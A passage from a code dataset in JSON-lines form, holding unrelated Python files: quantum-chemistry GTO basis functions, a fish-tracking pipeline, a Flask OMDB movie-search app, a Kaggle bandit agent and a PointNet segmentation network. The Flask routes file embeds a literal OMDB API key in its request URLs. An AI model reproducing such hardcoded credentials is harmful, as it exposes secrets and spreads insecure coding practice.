3*sqrt(pi)/(8*a**(5/2))\n\n observe: cosh(a) - sinh(a) = exp(-a)\n\n W = sp * ( 3*rc*cosh/(2*a**2) \n - 3*rc*sinh/(2*a**2) \n + 2*rc**2*cosh/a**(3/2) \n - 2*rc**2*sinh/a**(3/2) \n + 3*cosh/(8*a**(5/2)) \n - 3*sinh/(8*a**(5/2)) \n - 3/(8*a**(5/2))\n )\n\n\n \"\"\"\n sp = np.sqrt(np.pi)\n sqarc = np.sqrt(a)*rc\n #sinh = np.sinh(4*sqarc)\n #cosh = np.cosh(4*sqarc)\n exa = np.exp(-4*sqarc)\n \n W = sp * ( 3*rc*exa/(2*a**2) \n + 2*rc**2*exa/a**(3/2) \n + 3*(exa-1)/(8*a**(5/2)) \n ) \n \n return W\n\n\n\n\ndef Jolanta_GTO_W(GTO_fn, alphas, Ns, rc):\n \"\"\"\n potential w(r) matrix representation in a GTO basis set\n GTO_fn can be:\n Jolanta_3D_Wcap for the quadratic soft-box for CAP\n Jolanta_3D_Coulomb for a Coulomb potential for RAC\n Jolanta_3D_softbox for a inverse GTO soft-box for RAC \n Parameters\n ----------\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n rc : cutoff of w(r) \n\n Returns \n -------\n W : matrix represention of w(r)\n\n \"\"\"\n nbas = len(alphas)\n W=np.zeros((nbas,nbas))\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n W[i,i] = Ni * Ni * GTO_fn(ai+ai, rc)\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n W[i,j] = W[j,i] = Ni * Nj * GTO_fn(ai+aj, rc)\n return W\n\n\ndef Jolanta_GTO_VJrot(alphas, Ns, param, z):\n \"\"\"\n rotated Jolanta potential V_J(r*exp(I*theta)) in a GTO basis set\n ----------\n Parameters\n alphas : np.array of GTO exponents\n Ns : np.array of normalization constants\n param = (a,b,c) parameters of V_J = (a*r**2 - b)*exp(-c*r**2)\n z = alpha*exp(i*theta), where arg(z) < pi/4; \n -------\n Returns \n Vrot : matrix represention of V_J(r*exp(I*theta))\n \"\"\"\n nbas = len(alphas)\n W=np.zeros((nbas,nbas), complex)\n for i in range(nbas):\n ai, Ni = alphas[i], Ns[i]\n W[i,i] = Ni * Ni * Jolanta_3D_CS(ai+ai, param, z)\n for j in range(i):\n aj, Nj = alphas[j], Ns[j]\n W[i,j] = W[j,i] = Ni * Nj * Jolanta_3D_CS(ai+aj, param, z)\n return W\n\n\n \n \ndef Eval_GTO_wf_3D(alphas, Ns, cs, xs, u=True):\n \"\"\"\n This is the 3D function of l=1\n u(r) = r**2 * exp(-a*r**2)\n R(r) = r * exp(-a*r**2)\n input:\n alphas, norms = a basis set \n cs = GTO coefficient vector\n alphas, Ns, and cs define a wavefunction\n xs = positions at which the wf is to be evaluated\n u=True evaluate the radial function u(r) = r*R(r)\n u=False evaluate the radial function R(r) = u(r)/r\n \"\"\"\n if u:\n l=2\n else:\n l=1\n \n nx = len(xs)\n nbas = len(cs)\n ys = np.zeros(nx)\n for i in range(nx):\n y=0\n xsq = xs[i]**2\n for k in range(nbas):\n y += cs[k] * Ns[k] * np.exp(-alphas[k]*xsq)\n ys[i] = y*xs[i]**l\n return ys \n \n\n","repo_name":"tsommerfeld/L2-methods_for_resonances","sub_path":"Python_libs/GTO_basis.py","file_name":"GTO_basis.py","file_ext":"py","file_size_in_byte":12841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"1573428586","text":"import cv2\r\nimport numpy as np\r\nfrom numba import jit, int64, float64\r\n\r\ntry:\r\n from numba.experimental import jitclass\r\nexcept ModuleNotFoundError:\r\n from numba import jitclass\r\n\r\n\r\nfrom stytra.tracking.tail import find_fish_midline\r\nfrom stytra.tracking.preprocessing import BackgroundSubtractor\r\n\r\nfrom itertools import chain\r\n\r\nfrom lightparam import Param\r\nfrom stytra.tracking.simple_kalman import predict_inplace, update_inplace\r\nfrom stytra.tracking.pipelines import ImageToDataNode, NodeOutput\r\nfrom collections import namedtuple\r\n\r\n\r\ndef _fish_column_names(i_fish, n_segments):\r\n return [\r\n \"f{:d}_x\".format(i_fish),\r\n \"f{:d}_vx\".format(i_fish),\r\n \"f{:d}_y\".format(i_fish),\r\n \"f{:d}_vy\".format(i_fish),\r\n \"f{:d}_theta\".format(i_fish),\r\n \"f{:d}_vtheta\".format(i_fish),\r\n ] + [\"f{:d}_theta_{:02d}\".format(i_fish, i) for i in range(n_segments)]\r\n\r\n\r\nclass FishTrackingMethod(ImageToDataNode):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, name=\"fish_tracking\", **kwargs)\r\n self.monitored_headers = [\"biggest_area\", \"f0_theta\"]\r\n self.diagnostic_image_options = [\r\n \"background difference\",\r\n \"thresholded background difference\",\r\n \"fish detection\",\r\n \"thresholded for eye and swim bladder\",\r\n ]\r\n\r\n self.dilation_kernel = np.ones((3, 3), dtype=np.uint8)\r\n self.fishes = None\r\n\r\n def changed(self, vals):\r\n if any(\r\n p in vals.keys() for p in [\"n_segments\", \"n_fish_max\", \"bg_downsample\"]\r\n ) or vals.get(\"reset\", False):\r\n self.reset()\r\n\r\n def reset(self):\r\n self._output_type = namedtuple(\r\n \"t\",\r\n list(\r\n chain.from_iterable(\r\n [\r\n _fish_column_names(i_fish, self._params.n_segments - 1)\r\n for i_fish in range(self._params.n_fish_max)\r\n ]\r\n )\r\n )\r\n + [\"biggest_area\"],\r\n )\r\n self._output_type_changed = True\r\n\r\n # used for booking a spot for one of the potentially tracked fish\r\n self.fishes = Fishes(\r\n self._params.n_fish_max,\r\n n_segments=self._params.n_segments - 1,\r\n pos_std=self._params.pos_uncertainty,\r\n pred_coef=self._params.prediction_uncertainty,\r\n angle_std=np.pi / 10,\r\n persist_fish_for=self._params.persist_fish_for,\r\n )\r\n\r\n def _process(\r\n self,\r\n bg,\r\n n_fish_max: Param(1, (1, 50)),\r\n n_segments: Param(10, (2, 30)),\r\n bg_downsample: Param(1, (1, 8)),\r\n bg_dif_threshold: Param(25, (0, 255)),\r\n threshold_eyes: Param(35, (0, 255)),\r\n pos_uncertainty: Param(\r\n 1.0,\r\n (0, 10.0),\r\n desc=\"Uncertainty in pixels about the location of the head center of mass\",\r\n ),\r\n persist_fish_for: Param(\r\n 2,\r\n (1, 50),\r\n desc=\"How many frames does the fish persist for if it is not detected\",\r\n ),\r\n prediction_uncertainty: Param(0.1, (0.0, 10.0, 0.0001)),\r\n fish_area: Param((200, 1200), (1, 4000)),\r\n border_margin: Param(5, (0, 100)),\r\n tail_length: Param(60.0, (1.0, 200.0)),\r\n tail_track_window: Param(3, (3, 70)),\r\n ):\r\n\r\n # update the previously-detected fish using the Kalman filter\r\n if self.fishes is None:\r\n self.reset()\r\n else:\r\n self.fishes.predict()\r\n\r\n area_scale = bg_downsample * bg_downsample\r\n border_margin = border_margin // bg_downsample\r\n\r\n # downsample background\r\n if bg_downsample > 1:\r\n bg_small = cv2.resize(bg, None, fx=1 / bg_downsample, fy=1 / bg_downsample)\r\n else:\r\n bg_small = bg\r\n\r\n bg_thresh = cv2.dilate(\r\n (bg_small > bg_dif_threshold).view(dtype=np.uint8), self.dilation_kernel\r\n )\r\n\r\n # find regions where there is a difference with the background\r\n n_comps, labels, stats, centroids = cv2.connectedComponentsWithStats(bg_thresh)\r\n\r\n try:\r\n max_area = np.max(stats[1:, cv2.CC_STAT_AREA]) * area_scale\r\n except ValueError:\r\n max_area = 0\r\n\r\n # iterate through all the regions different from the background and try\r\n # to find fish\r\n\r\n messages = []\r\n\r\n nofish = True\r\n for row, centroid in zip(stats, centroids):\r\n # check if the contour is fish-sized and central enough\r\n if not fish_area[0] < row[cv2.CC_STAT_AREA] * area_scale < fish_area[1]:\r\n continue\r\n\r\n # find the bounding box of the fish in the original image coordinates\r\n ftop, fleft, fheight, fwidth = (\r\n int(round(row[x] * bg_downsample))\r\n for x in [\r\n cv2.CC_STAT_TOP,\r\n cv2.CC_STAT_LEFT,\r\n cv2.CC_STAT_HEIGHT,\r\n cv2.CC_STAT_WIDTH,\r\n ]\r\n )\r\n\r\n if not (\r\n (fleft - border_margin >= 0)\r\n and (fleft + fwidth + border_margin < bg.shape[1])\r\n and (ftop - border_margin >= 0)\r\n and (ftop + fheight + border_margin < bg.shape[0])\r\n ):\r\n messages.append(\"W:An object of right area found outside margins\")\r\n continue\r\n\r\n # how much is this region shifted from the upper left corner of the image\r\n cent_shift = np.array([fleft - border_margin, ftop - border_margin])\r\n\r\n slices = (\r\n slice(ftop - border_margin, ftop + fheight + border_margin),\r\n slice(fleft - border_margin, fleft + fwidth + border_margin),\r\n )\r\n\r\n # take the region and mask the background away to aid detection\r\n fishdet = bg[slices].copy()\r\n\r\n # estimate the position of the head\r\n fish_coords = fish_start(fishdet, threshold_eyes)\r\n\r\n # if no actual fish was found here, continue on to the next connected component\r\n if fish_coords[0] == -1:\r\n messages.append(\"W:No appropriate tail start position found\")\r\n continue\r\n\r\n head_coords_up = fish_coords + cent_shift\r\n\r\n theta = _fish_direction_n(bg, head_coords_up, int(round(tail_length / 2)))\r\n\r\n # find the points of the tail\r\n points = find_fish_midline(\r\n bg,\r\n *head_coords_up,\r\n theta,\r\n tail_track_window,\r\n tail_length / n_segments,\r\n n_segments + 1,\r\n )\r\n\r\n # convert to angles\r\n angles = np.mod(points_to_angles(points) + np.pi, np.pi * 2) - np.pi\r\n if len(angles) == 0:\r\n messages.append(\"W:Tail not completely detectable\")\r\n continue\r\n\r\n # also, make the angles continuous\r\n angles[1:] = np.unwrap(angles[1:] - angles[0])\r\n\r\n # put the data together for one fish\r\n fish_coords = np.concatenate([np.array(points[0][:2]), angles])\r\n\r\n nofish = False\r\n # check if this is a new fish, or it is an update of\r\n # a fish detected previously\r\n if self.fishes.update(fish_coords):\r\n messages.append(\"I:Updated previous fish\")\r\n elif self.fishes.add_fish(fish_coords):\r\n messages.append(\"I:Added new fish\")\r\n else:\r\n messages.append(\"E:More fish than n_fish max\")\r\n\r\n if nofish:\r\n messages.append(\r\n \"W:No object of right area, between {:.0f} and {:.0f}\".format(\r\n *fish_area\r\n )\r\n )\r\n\r\n # if a debugging image is to be shown, set it\r\n if self.set_diagnostic == \"background difference\":\r\n self.diagnostic_image = bg\r\n elif self.set_diagnostic == \"thresholded background difference\":\r\n self.diagnostic_image = bg_thresh\r\n elif self.set_diagnostic == \"fish detection\":\r\n fishdet = bg_small.copy()\r\n fishdet[bg_thresh == 0] = 0\r\n self.diagnostic_image = fishdet\r\n elif self.set_diagnostic == \"thresholded for eye and swim bladder\":\r\n self.diagnostic_image = np.maximum(bg, threshold_eyes) - threshold_eyes\r\n\r\n if self._output_type is None:\r\n self.reset_state()\r\n return NodeOutput(\r\n messages, self._output_type(*self.fishes.coords.flatten(), max_area * 1.0)\r\n )\r\n\r\n\r\nspec = [\r\n (\"n_fish\", int64),\r\n (\"coords\", float64[:, :]),\r\n (\"i_not_updated\", int64[:]),\r\n (\"F\", float64[:, :]),\r\n (\"uncertainties\", float64[:]),\r\n (\"Q\", float64[:, :]),\r\n (\"Ps\", float64[:, :, :, :]),\r\n (\"def_P\", float64[:, :, :]),\r\n (\"persist_fish_for\", int64),\r\n]\r\n\r\n\r\n@jitclass(spec)\r\nclass Fishes(object):\r\n def __init__(\r\n self, n_fish_max, pos_std, angle_std, n_segments, pred_coef, persist_fish_for\r\n ):\r\n self.n_fish = n_fish_max\r\n self.coords = np.full((n_fish_max, 6 + n_segments), np.nan)\r\n self.uncertainties = np.array((pos_std, angle_std, angle_std))\r\n self.def_P = np.zeros((3, 2, 2))\r\n for i, uc in enumerate(self.uncertainties):\r\n self.def_P[i, 0, 0] = uc\r\n self.def_P[i, 1, 1] = uc\r\n self.i_not_updated = np.zeros(n_fish_max, dtype=np.int64)\r\n self.Ps = np.zeros((n_fish_max, 3, 2, 2))\r\n self.F = np.array([[1.0, 1.0], [0.0, 1.0]])\r\n dt = 0.02\r\n self.Q = (\r\n np.array([[0.25 * dt**4, 0.5 * dt**3], [0.5 * dt**3, dt**2]])\r\n * pred_coef\r\n )\r\n self.persist_fish_for = persist_fish_for\r\n\r\n def predict(self):\r\n for i_fish in range(self.n_fish):\r\n if not np.isnan(self.coords[i_fish, 0]):\r\n for i_coord in range(0, 6, 2):\r\n predict_inplace(\r\n self.coords[i_fish, i_coord : i_coord + 2],\r\n self.Ps[i_fish, i_coord // 2],\r\n self.F,\r\n self.Q,\r\n )\r\n self.i_not_updated[i_fish] += 1\r\n if self.i_not_updated[i_fish] > self.persist_fish_for:\r\n self.coords[i_fish, :] = np.nan\r\n\r\n def update(self, new_fish):\r\n for i_fish in range(self.n_fish):\r\n if not np.isnan(self.coords[i_fish, 0]):\r\n if self.is_close(new_fish, i_fish) and self.i_not_updated[i_fish] != 0:\r\n # update position with Kalman filtering\r\n for i_coord in range(0, 3):\r\n # if it is the angle find the modulo 2pi closest\r\n nc = new_fish[i_coord]\r\n if i_coord == 2:\r\n nc = _minimal_angle_dif(self.coords[i_fish, 4], nc)\r\n update_inplace(\r\n nc,\r\n self.coords[i_fish, i_coord * 2 : i_coord * 2 + 2],\r\n self.Ps[i_fish, i_coord],\r\n self.uncertainties[i_coord],\r\n )\r\n # update tail angles\r\n self.coords[i_fish, 6:] = new_fish[3:]\r\n self.i_not_updated[i_fish] = 0\r\n return True\r\n\r\n def add_fish(self, new_fish):\r\n for i_fish in range(self.n_fish):\r\n if np.isnan(self.coords[i_fish, 0]):\r\n self.coords[i_fish, 0:6:2] = new_fish[:3]\r\n self.coords[i_fish, 1:6:2] = 0.0\r\n self.coords[i_fish, 6:] = new_fish[3:]\r\n self.Ps[i_fish] = self.def_P\r\n self.i_not_updated[i_fish] = 0\r\n return True\r\n return False\r\n\r\n def is_close(self, new_fish, i_fish):\r\n \"\"\"Check whether the new coordinates are\r\n within a certain number of pixels of the old estimate\r\n and within a certain angle\r\n \"\"\"\r\n n_px = 15\r\n d_theta = np.pi / 2\r\n dists = new_fish[:2] - self.coords[i_fish, 0:4:2]\r\n dtheta = np.abs(\r\n np.mod(new_fish[2] - self.coords[i_fish, 4] + np.pi, np.pi * 2) - np.pi\r\n )\r\n\r\n return np.sum(dists**2) < n_px**2 and dtheta < d_theta\r\n\r\n\r\n@jit(nopython=True)\r\ndef points_to_angles(points):\r\n angles = np.empty(len(points) - 1, dtype=np.float64)\r\n for i, (p1, p2) in enumerate(zip(points[0:-1], points[1:])):\r\n angles[i] = np.arctan2(p2[1] - p1[1], p2[0] - p1[0])\r\n return angles\r\n\r\n\r\n@jit(nopython=True)\r\ndef fish_start(mask, take_min):\r\n su = 0.0\r\n ret = np.full((2,), 0.0)\r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if mask[i, j] > take_min:\r\n dm = mask[i, j] - take_min\r\n ret[1] += dm * i\r\n ret[0] += dm * j\r\n su += dm\r\n\r\n if su > 0.0:\r\n return ret / su\r\n else:\r\n ret[:] = -1\r\n return ret\r\n\r\n\r\n# Utilities for drawing circles.\r\n\r\n\r\n@jit(nopython=True)\r\ndef _symmetry_points(x0, y0, x, y):\r\n return [\r\n (x0 + x, y0 + y),\r\n (x0 - x, y0 + y),\r\n (x0 + x, y0 - y),\r\n (x0 - x, y0 - y),\r\n (x0 + y, y0 + x),\r\n (x0 - y, y0 + x),\r\n (x0 + y, y0 - x),\r\n (x0 - y, y0 - x),\r\n ]\r\n\r\n\r\n@jit(nopython=True)\r\ndef _circle_points(x0, y0, radius):\r\n \"\"\"Bresenham's circle algorithm\r\n\r\n Parameters\r\n ----------\r\n xc : center x\r\n yc : center y\r\n r : radius\r\n\r\n Returns\r\n -------\r\n a list of points\r\n\r\n \"\"\"\r\n f = 1 - radius\r\n ddf_x = 1\r\n ddf_y = -2 * radius\r\n x = 0\r\n y = radius\r\n points = [\r\n (x0, y0 + radius),\r\n (x0, y0 - radius),\r\n (x0 + radius, y0),\r\n (x0 - radius, y0),\r\n ]\r\n while x < y:\r\n if f >= 0:\r\n y -= 1\r\n ddf_y += 2\r\n f += ddf_y\r\n x += 1\r\n ddf_x += 2\r\n f += ddf_x\r\n points.extend(_symmetry_points(x0, y0, x, y))\r\n return points\r\n\r\n\r\n@jit(nopython=True)\r\ndef _fish_direction_n(image, start_loc, radius):\r\n centre_int = start_loc.astype(np.int16)\r\n pixels_rad = _circle_points(centre_int[0], centre_int[1], radius)\r\n max_point = pixels_rad[0]\r\n max_val = 0\r\n h, w = image.shape\r\n for x, y in pixels_rad:\r\n if x < 0 or y < 0 or x >= w or y >= h:\r\n continue\r\n if image[y, x] > max_val:\r\n max_val = image[y, x]\r\n max_point = (x, y)\r\n return np.arctan2(max_point[1] - centre_int[1], max_point[0] - centre_int[0])\r\n\r\n\r\n@jit(nopython=True)\r\ndef _minimal_angle_dif(th_old, th_new):\r\n return th_old + np.mod(th_new - th_old + np.pi, np.pi * 2) - np.pi\r\n","repo_name":"portugueslab/stytra","sub_path":"stytra/tracking/fish.py","file_name":"fish.py","file_ext":"py","file_size_in_byte":14928,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"73"} +{"seq_id":"33871607673","text":"from flask import render_template, request, flash, redirect, url_for\nfrom app import app, models\nfrom app.forms import SearchForm, ResultForm\nfrom app import db\nfrom app.models import result\nimport requests\nimport json\nimport urllib.request as pull \n\n@app.route('/')\n@app.route('/index') \ndef index():\n form = SearchForm()\n # clearing the database of existing data to avoid duplicates\n db.session.query(result).delete()\n db.session.commit()\n return render_template('index.html', title='Home', form=form)\n\n@app.route('/search', methods=[\"GET\",\"POST\"], defaults={\"page\":1})\n@app.route(\"/search/\", methods=[\"GET\"])\ndef search(page):\n form = ResultForm()\n if request.method =='POST':\n # receives the incoming POST request from the form and turns it into text\n text = request.form['text'] \n # processes the text into a string format to add to the API query string\n results = _return_json(text) \n if results is False:\n flash(\"No results found, please enter new search terms\")\n return redirect(\"/index\")\n search_results = results.paginate(page, app.config[\"RESULTS_PER_PAGE\"], False)\n next_url = url_for('search', page=search_results.next_num) if search_results.has_next else None\n prev_url = url_for('search', page=search_results.prev_num) if search_results.has_prev else None\n return render_template('search.html', title=\"Results\", results=search_results.items, form=form, next_url=next_url, prev_url=prev_url)\n else:\n results = db.session.query(result).paginate(page, app.config[\"RESULTS_PER_PAGE\"], False)\n next_url = url_for('search', page=results.next_num) if results.has_next else None\n prev_url = url_for('search', page=results.prev_num) if results.has_prev else None\n return render_template('search.html', title=\"Results\", results=results.items, form=form, next_url=next_url, prev_url=prev_url)\n\n@app.route('/details', methods=[\"POST\"])\ndef details():\n text_id = request.form['imdbID']\n to_be_returned_from_OMDB =\"https://www.omdbapi.com/?i=\"+text_id+\"&apikey=e3c04726\"\n with pull.urlopen(to_be_returned_from_OMDB) as response:\n source = response.read()\n data = json.loads(source)\n movie_title = data[\"Title\"]\n year = data[\"Year\"]\n released = data[\"Released\"]\n runtime = data[\"Runtime\"]\n genre = data[\"Genre\"]\n director = data[\"Director\"]\n poster = data[\"Poster\"]\n return render_template('movie_detail.html', movie_title=movie_title, year=year, released=released, runtime=runtime, genre=genre,director=director,poster=poster)\n\ndef _return_json(text):\n \"\"\"function for addiing json object results to db depending on result amount and returning a SQLAlchemy object\"\"\"\n # starts of by getting the url for the first page of results \n url_string = _string_to_url(text, 1)\n # stores the JSON object from the api as a python dictionary\n with pull.urlopen(url_string) as response:\n source = response.read()\n data = json.loads(source)\n \n if data[\"Response\"] == \"False\":\n # if the json object found no results, then redirect back to the home search screen\n return False \n # otherwise, if response is at least one ...\n else:\n total_results = int(data[\"totalResults\"])\n total_pages = total_results // 10\n if total_pages >= 5:\n for i in range(1,6):\n url_string = _string_to_url(text,i)\n _add_to_db(url_string)\n return db.session.query(result)\n else:\n for i in range(1,total_pages + 1):\n url_string = _string_to_url(text,i)\n _add_to_db(url_string)\n return db.session.query(result)\n\ndef _string_to_url(text, num):\n \"\"\"function for converting text to a url for omdb api\n param: text string\n param: specific page number of total results to return\"\"\"\n text_two = text.split()\n processed = \"+\".join(text_two)\n to_be_returned_from_OMDB =\"https://www.omdbapi.com/?s=\"+processed+\"&page=\"+str(num)+\"&apikey=e3c04726\"\n return to_be_returned_from_OMDB\n\ndef _add_to_db(url_string):\n \"\"\" helper function for _return_json function that adds json object results to database (db)\"\"\"\n\n # uses the 'urllib.request as pull' to open the url as a response and then open as a dictionary with data\n with pull.urlopen(url_string) as response:\n source = response.read()\n data = json.loads(source)\n search_list = data[\"Search\"]\n for movie in search_list:\n result1 = result(imdbID=movie[\"imdbID\"], title=movie[\"Title\"], year=movie[\"Year\"])\n db.session.add(result1)\n db.session.commit()\n","repo_name":"willdevgar/OMDBmoviesite","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"348572129","text":"# pip install kaggle-environments --upgrade -q\nfrom collections import defaultdict, namedtuple\nimport random\n\nclass Arm:\n # An arm needs to remember the relevant history:\n # - when my opponent selected it\n # - when I selected it, with the reward I got\n def __init__(self, i):\n self.i = i\n self.my_actions_and_rewards = {} # step number to reward\n self.opponent_actions = set() # step number when my opponent chose it\n def __repr__(self):\n if len(self.my_actions_and_rewards) == 0 and len(self.opponent_actions) == 0:\n return ''\n return repr(dict(\n me = list(sorted(self.my_actions_and_rewards.items())),\n op = list(self.opponent_actions),\n ))\n\nO = namedtuple('O', 'remainingOverageTime step agentIndex reward lastActions')\n\nallActions = []\nmy_total_reward = 0\nmy_rewards = []\n\narms = [Arm(i) for i in range(100)]\n\ndef random_agent(observation, configuration):\n \n o = O(**observation)\n # print(observation, configuration)\n if o.step == 0:\n # No option on the first round really\n return random.randrange(configuration.banditCount)\n\n global my_total_reward\n\n allActions.append(o.lastActions)\n my_last_action = allActions[-1][o.agentIndex]\n opponents_last_action = allActions[-1][1-o.agentIndex]\n\n # recording what happened\n my_last_reward = o.reward - my_total_reward\n my_rewards.append(my_last_reward)\n my_total_reward = o.reward\n arms[my_last_action].my_actions_and_rewards[o.step-1]=my_last_reward\n arms[opponents_last_action].opponent_actions.add(o.step-1)\n\n #print(my_total_reward, my_rewards), checks assumption you either get 1 or 0 reward\n assert 0 <= my_last_reward <= 1\n\n assert my_total_reward == sum(r for a in arms for r in a.my_actions_and_rewards.values())\n\n\n # Start taking action\n\n # If the last one worked, try it again\n if my_last_reward == 1:\n return my_last_action\n\n # If my opponent repeated himself, copy him\n if len(allActions) >= 2:\n op2 = allActions[-2][1-o.agentIndex]\n op1 = allActions[-1][1-o.agentIndex]\n assert op1 == opponents_last_action\n if op1 == op2:\n return op1\n\n\n # Anything I haven't selected yet\n unselected_by_me = [a.i for a in arms if len(a.my_actions_and_rewards) == 0]\n if len(unselected_by_me) > 0:\n return unselected_by_me[0]\n\n # Give up, random choice\n return random.randrange(configuration.banditCount)\n\n\"\"\"\nThis competition is modeled after the \"multi-armed bandit problem,\" a classic probability-based, reinforcement learning problem that examines the exploration-exploitation tradeoff dilemma.\n\nIn this problem, both participants will work with the same set of 100 vending machines (bandits).\nEach bandit provides a random reward based on a probability distribution specific to that machine.\nEvery round each player selects (\"pulls\") a bandit,\nthe likelihood of a reward decreases by 3%.\n\nEach agent can see the move of the other agent, but will not see whether a reward was gained in their respective bandit pull.\n\nThis episode continues for 2000 rounds per player (4000 pulls total).\n\n\nAn Agent will receive an observation containing their total reward,\nthe bandits pulled by both players in the previous turn (lastActions),\nthe current step of the competition,\nand the remainingOverageTime.\n\"\"\"\n","repo_name":"Veganveins/candy_canes","sub_path":"basic_v2.py","file_name":"basic_v2.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"26965514184","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.utils.data\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\n\n\nclass STN_input(nn.Module):\n def __init__(self, num_points = 4096):\n super(STN_input, self).__init__()\n self.num_points = num_points\n self.conv1 = nn.Conv1d(4, 64, 1)\n self.conv2 = nn.Conv1d(64, 128, 1)\n self.conv3 = nn.Conv1d(128, 1024, 1)\n self.fc1 = nn.Linear(1024, 512)\n self.fc2 = nn.Linear(512, 256)\n self.fc3 = nn.Linear(256, 16)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(1024)\n self.bn4 = nn.BatchNorm1d(512)\n self.bn5 = nn.BatchNorm1d(256)\n\n\n def forward(self, x):\n batchsize = x.size()[0]\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.max_pool1d(x, self.num_points)\n x = x.view(-1, 1024)\n\n x = F.relu(self.bn4(self.fc1(x)))\n x = F.relu(self.bn5(self.fc2(x)))\n x = self.fc3(x)\n\n iden = Variable(torch.from_numpy(np.eye(4).astype(np.float32))).view(1,4*4).repeat(batchsize,1)\n if x.is_cuda:\n iden = iden.cuda()\n x = x + iden\n x = x.view(-1, 4, 4)\n return x\n\nclass STN_feature(nn.Module):\n def __init__(self, num_points = 4096):\n super(STN_feature, self).__init__()\n self.num_points = num_points\n self.conv1 = nn.Conv1d(64, 64, 1)\n self.conv2 = nn.Conv1d(64, 128, 1)\n self.conv3 = nn.Conv1d(128, 1024, 1)\n self.fc1 = nn.Linear(1024, 512)\n self.fc2 = nn.Linear(512, 256)\n self.fc3 = nn.Linear(256, 64*64)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(128)\n self.bn3 = nn.BatchNorm1d(1024)\n self.bn4 = nn.BatchNorm1d(512)\n self.bn5 = nn.BatchNorm1d(256)\n\n def forward(self, x):\n batchsize = x.size()[0]\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.max_pool1d(x, self.num_points)\n x = x.view(-1, 1024)\n\n x = F.relu(self.bn4(self.fc1(x)))\n x = F.relu(self.bn5(self.fc2(x)))\n x = self.fc3(x)\n\n iden = Variable(torch.from_numpy(np.eye(64).astype(np.float32))).view(1,64*64).repeat(batchsize,1)\n if x.is_cuda:\n iden = iden.cuda()\n x = x + iden\n x = x.view(-1, 64, 64)\n return x\n\n\nclass PointNetSeg(nn.Module):\n def __init__(self, num_points = 4096, num_classes = 8):\n super(PointNetSeg, self).__init__()\n self.num_classes = num_classes\n self.num_points = num_points\n self.stn1 = STN_input(num_points = self.num_points)\n self.stn2 = STN_feature(num_points = self.num_points)\n self.conv1 = nn.Conv1d(4, 64, 1)\n self.conv2 = nn.Conv1d(64, 64, 1)\n self.conv3 = nn.Conv1d(64, 64, 1)\n self.conv4 = nn.Conv1d(64, 128, 1)\n self.conv5 = nn.Conv1d(128, 1024, 1)\n self.conv6 = nn.Conv1d(1088, 512, 1)\n self.conv7 = nn.Conv1d(512, 256, 1)\n self.conv8 = nn.Conv1d(256, 128, 1)\n self.conv9 = nn.Conv1d(128, 128, 1)\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(64)\n self.bn3 = nn.BatchNorm1d(64)\n self.bn4 = nn.BatchNorm1d(128)\n self.bn5 = nn.BatchNorm1d(1024)\n self.bn6 = nn.BatchNorm1d(512)\n self.bn7 = nn.BatchNorm1d(256)\n self.bn8 = nn.BatchNorm1d(128)\n self.bn9 = nn.BatchNorm1d(128)\n self.dropout = nn.Dropout(0.3)\n self.cls = nn.Conv1d(128, self.num_classes, 1)\n\n def set_num_points(self, num_points):\n self.num_points = num_points\n self.stn1.num_points = num_points\n self.stn2.num_points = num_points\n\n\n\n def forward(self, x):\n batchsize = x.size()[0]\n\n # input transform\n trans1 = self.stn1(x)\n x = x.transpose(2,1)\n x = torch.bmm(x, trans1)\n x = x.transpose(2,1)\n\n # point feature extractor\n x = F.relu(self.bn1(self.conv1(x)))\n x = F.relu(self.bn2(self.conv2(x)))\n\n # feature transform\n trans2 = self.stn2(x)\n x = x.transpose(2,1)\n x = torch.bmm(x, trans2)\n x = x.transpose(2,1)\n\n pointfeat = x\n\n # global feature extractor\n x = F.relu(self.bn3(self.conv3(x)))\n x = F.relu(self.bn4(self.conv4(x)))\n x = F.relu(self.bn5(self.conv5(x)))\n globalfeat = F.max_pool1d(x, self.num_points)\n globalfeat = globalfeat.view(-1, 1024, 1).repeat(1, 1, self.num_points)\n\n x = torch.cat([pointfeat, globalfeat], 1)\n x = F.relu(self.bn6(self.conv6(x)))\n x = F.relu(self.bn7(self.conv7(x)))\n x = F.relu(self.bn8(self.conv8(x)))\n x = F.relu(self.bn9(self.conv9(x)))\n\n # classfier\n x = self.dropout(x)\n x = self.cls(x)\n # (B*C*N) -> (B*N*C)\n x = x.transpose(2, 1).contiguous()\n x = F.log_softmax(x, -1)\n return x\n\n\n\nif __name__ == '__main__':\n inputdata = Variable(torch.rand(2,4,2048))\n seg = PointNetSeg(num_points=2048)\n out= seg(inputdata)\n print('seg', out.size())","repo_name":"SmallHedgehog/points_seg","sub_path":"model/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"30901390375","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import simps\nfrom colossus.cosmology import cosmology\nfrom scipy.special import spherical_jn as spjn\nfrom scipy.interpolate import interp2d\nfrom pqdm.processes import pqdm\n\ndef 